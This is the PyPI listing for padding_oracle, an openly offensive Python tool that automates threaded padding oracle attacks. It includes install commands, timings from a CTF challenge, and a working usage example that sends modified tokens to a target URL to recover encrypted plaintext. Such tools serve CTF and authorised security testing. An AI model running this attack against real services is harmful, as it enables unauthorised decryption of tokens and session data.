Threaded padding oracle automation.
Project description
padding_oracle.py
Fast threaded padding oracle attack automation script for Python 3.
Install
PyPI:
pip3 install -U padding_oracle
GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
Tested on [0x09] Cathub Party from EDU-CTF:
| Request Threads | Execution Time |
|---|---|
| 1 | 17m 43s |
| 4 | 5m 23s |
| 16 | 1m 20s |
| 64 | 56s |
Usage
Let's say we are going to test https://the.target.site/api/?token=BASE64_ENCODED_TOKEN
from padding_oracle import padding_oracle, base64_encode, base64_decode import requests, string sess = requests.Session() # for connection pool url = 'https://the.target.site/api/' def check_decrypt(cipher: bytes): resp = sess.get(url, params={'token': base64_encode(cipher)}) if 'failed' in resp.text: return False elif 'success' in resp.text: return True else: raise RuntimeError('unexpected behavior') cipher = base64_decode('BASE64_ENCODED_TOKEN') # becomes IV + block1 + block2 + ... assert len(cipher) % 16 == 0 plaintext = padding_oracle( cipher, # cipher bytes block_size = 16, oracle = check_decrypt, num_threads = 16, chars = string.printable # possible plaintext chars )
This package also provides PHP-like encoding/decoding functions:
from padding_oracle.encoding import ( urlencode, urldecode, base64_encode, base64_decode, )
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
padding_oracle-0.2.2.tar.gz
(8.2 kB
view hashes)
Built Distribution
Close
Hashes for padding_oracle-0.2.2-py3-none-any.whl
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 170cdd7d700e3c2dab0aec0b7720d2341ce95c90277e846fb28dc0fee1ee2516 |
|
| MD5 | 3b6e0829575106b3f5fb848f2c838500 |
|
| BLAKE2-256 | 4807dac5e53651df1077595628d6d7f111736204b9c0b3aa70006f8370f140b5 |